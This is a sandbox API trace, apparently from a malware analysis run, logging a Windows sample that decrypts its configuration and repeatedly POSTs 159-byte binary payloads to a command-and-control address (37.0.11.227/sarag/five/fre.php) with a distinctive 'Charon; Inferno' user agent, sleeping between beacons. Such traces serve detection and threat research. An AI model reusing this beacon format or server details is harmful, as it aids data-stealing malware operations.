[0340.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0340.878] GetProcessHeap () returned 0x690000 [0340.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0340.879] GetProcessHeap () returned 0x690000 [0340.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0340.883] GetProcessHeap () returned 0x690000 [0340.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0340.883] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1994) returned 0xc44 [0340.885] Sleep (dwMilliseconds=0xea60) [0340.887] GetProcessHeap () returned 0x690000 [0340.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0340.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.888] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0340.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.896] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0340.905] GetProcessHeap () returned 0x690000 [0340.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0340.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.906] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0340.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.907] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0340.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.036] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0341.036] GetProcessHeap () returned 0x690000 [0341.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0341.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.038] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0341.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.043] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0341.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.044] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0341.044] GetProcessHeap () returned 0x690000 [0341.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0341.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.045] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0341.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.047] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0341.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.048] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0341.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.049] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0341.049] GetProcessHeap () returned 0x690000 [0341.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0341.049] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0341.049] GetProcessHeap () returned 0x690000 [0341.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0341.050] GetProcessHeap () returned 0x690000 [0341.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0341.050] GetProcessHeap () returned 0x690000 [0341.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0341.051] GetProcessHeap () returned 0x690000 [0341.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0341.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.054] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0341.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.064] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0341.078] GetProcessHeap () returned 0x690000 [0341.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0341.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.079] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0341.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.080] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0341.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.082] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0341.082] GetProcessHeap () returned 0x690000 [0341.082] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0341.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.088] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0341.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.133] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0341.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.134] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0341.134] GetProcessHeap () returned 0x690000 [0341.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0341.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.136] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0341.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.137] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0341.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.138] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0341.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.142] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0341.142] GetProcessHeap () returned 0x690000 [0341.142] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0341.142] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0341.142] GetProcessHeap () returned 0x690000 [0341.142] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0341.142] socket (af=2, type=1, protocol=6) returned 0xc48 [0341.143] connect (s=0xc48, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0341.171] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0341.171] GetProcessHeap () returned 0x690000 [0341.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0341.171] GetProcessHeap () returned 0x690000 [0341.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0341.172] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0341.175] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0341.176] GetProcessHeap () returned 0x690000 [0341.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0341.176] GetProcessHeap () returned 0x690000 [0341.176] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0341.177] GetProcessHeap () returned 0x690000 [0341.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0341.177] GetProcessHeap () returned 0x690000 [0341.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0341.177] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0341.178] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0341.178] GetProcessHeap () returned 0x690000 [0341.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0341.179] GetProcessHeap () returned 0x690000 [0341.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0341.179] send (s=0xc48, buf=0x6ad508*, len=242, flags=0) returned 242 [0341.180] send (s=0xc48, buf=0x6aba40*, len=159, flags=0) returned 159 [0341.180] GetProcessHeap () returned 0x690000 [0341.180] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0341.180] recv (in: s=0xc48, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0341.254] GetProcessHeap () returned 0x690000 [0341.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0341.254] GetProcessHeap () returned 0x690000 [0341.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0341.255] GetProcessHeap () returned 0x690000 [0341.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0341.256] GetProcessHeap () returned 0x690000 [0341.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0341.256] closesocket (s=0xc48) returned 0 [0341.257] GetProcessHeap () returned 0x690000 [0341.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0341.257] GetProcessHeap () returned 0x690000 [0341.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0341.257] GetProcessHeap () returned 0x690000 [0341.258] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0341.258] GetProcessHeap () returned 0x690000 [0341.258] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0341.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1998) returned 0xc48 [0341.260] Sleep (dwMilliseconds=0xea60) [0341.262] GetProcessHeap () returned 0x690000 [0341.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0341.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.263] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0341.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.268] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0341.274] GetProcessHeap () returned 0x690000 [0341.274] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0341.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.275] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0341.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.276] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0341.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.277] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0341.277] GetProcessHeap () returned 0x690000 [0341.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0341.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.279] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0341.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.280] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0341.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.280] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0341.280] GetProcessHeap () returned 0x690000 [0341.281] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0341.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.281] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0341.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.282] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0341.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.286] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0341.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.287] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0341.287] GetProcessHeap () returned 0x690000 [0341.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0341.287] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0341.288] GetProcessHeap () returned 0x690000 [0341.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0341.288] GetProcessHeap () returned 0x690000 [0341.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0341.288] GetProcessHeap () returned 0x690000 [0341.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0341.289] GetProcessHeap () returned 0x690000 [0341.289] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0341.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.290] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0341.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.296] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0341.302] GetProcessHeap () returned 0x690000 [0341.302] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0341.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.303] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0341.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.304] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0341.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.307] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0341.307] GetProcessHeap () returned 0x690000 [0341.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0341.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.308] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0341.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.309] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0341.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.310] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0341.310] GetProcessHeap () returned 0x690000 [0341.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0341.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.311] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0341.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.312] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0341.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.313] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0341.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.314] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0341.314] GetProcessHeap () returned 0x690000 [0341.314] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0341.314] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0341.314] GetProcessHeap () returned 0x690000 [0341.314] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0341.314] socket (af=2, type=1, protocol=6) returned 0xc4c [0341.314] connect (s=0xc4c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0341.350] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0341.350] GetProcessHeap () returned 0x690000 [0341.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0341.350] GetProcessHeap () returned 0x690000 [0341.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0341.350] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0341.351] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0341.351] GetProcessHeap () returned 0x690000 [0341.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0341.351] GetProcessHeap () returned 0x690000 [0341.352] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0341.352] GetProcessHeap () returned 0x690000 [0341.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0341.352] GetProcessHeap () returned 0x690000 [0341.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0341.353] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0341.353] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0341.353] GetProcessHeap () returned 0x690000 [0341.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0341.353] GetProcessHeap () returned 0x690000 [0341.354] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0341.354] send (s=0xc4c, buf=0x6ad508*, len=242, flags=0) returned 242 [0341.354] send (s=0xc4c, buf=0x6aba40*, len=159, flags=0) returned 159 [0341.354] GetProcessHeap () returned 0x690000 [0341.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0341.354] recv (in: s=0xc4c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0341.435] GetProcessHeap () returned 0x690000 [0341.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0341.436] GetProcessHeap () returned 0x690000 [0341.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0341.437] GetProcessHeap () returned 0x690000 [0341.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0341.437] GetProcessHeap () returned 0x690000 [0341.438] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0341.438] closesocket (s=0xc4c) returned 0 [0341.438] GetProcessHeap () returned 0x690000 [0341.438] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0341.438] GetProcessHeap () returned 0x690000 [0341.439] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0341.441] GetProcessHeap () returned 0x690000 [0341.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0341.441] GetProcessHeap () returned 0x690000 [0341.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0341.442] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x199c) returned 0xc4c [0341.444] Sleep (dwMilliseconds=0xea60) [0341.446] GetProcessHeap () returned 0x690000 [0341.446] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0341.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.447] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0341.456] LoadLibraryW 